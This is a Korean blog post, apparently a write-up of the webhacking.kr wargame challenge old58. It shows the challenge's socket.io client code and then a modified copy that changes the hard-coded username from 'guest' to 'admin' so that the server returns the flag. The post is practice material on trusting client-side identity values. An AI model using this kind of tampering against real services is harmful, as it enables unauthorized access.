webhacking.kr - old58

2021. 1. 16. 10:37WarGame/webhaking.kr

문제 화면

 

 

처음 들어가면 이렇게 백지인데 명령어를 쳐보면

 

 

 

이런식으로 무언가를 출력해주려고 합니다.

flag를 출력하려고 하면

 

"permission denied... admin only!"

 

라는 메세지를 출력합니다.

소스코드를 확인해보면

 

1
2
3
4
5
6
7
8
9
10
11
12
13
 $(function () {
      var username = "guest";
      var socket = io();
      $('form').submit(function(e){
        e.preventDefault();
        socket.emit('cmd',username+":"+$('#m').val());
        $('#m').val('');
        return false;
      });
      socket.on('cmd'function(msg){
        $('#messages').append($('<li>').text(msg));
      });
    });
cs

 

 

이 코드가 통신하는 부분인데 guest --> admin 이 되야할 것 같고, 우리가 필요한건 flag이므로 

 

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
   $(function () {
      var username = "admin";
      var socket = io();
      $('form').submit(function(e){
        e.preventDefault();
        socket.emit('cmd',username+":"+'flag');
        $('#m').val('');
        return false;
      });
      socket.on('cmd'function(msg){
        $('#messages').append($('<li>').text(msg));
      });
    });
 
cs

 

 

와 같이 변경한 후 flag를 입력하면

 

flag를 획득할 수 있습니다 :)

'WarGame > webhaking.kr' 카테고리의 다른 글

webhacking.kr - old54  (0) 2021.01.25
webhacking.kr - old47  (0) 2021.01.22
Webhacking.kr 24번  (0) 2018.11.07
Webhacking.kr 4번  (0) 2018.11.07
Webhacking.kr 17번  (0) 2018.11.06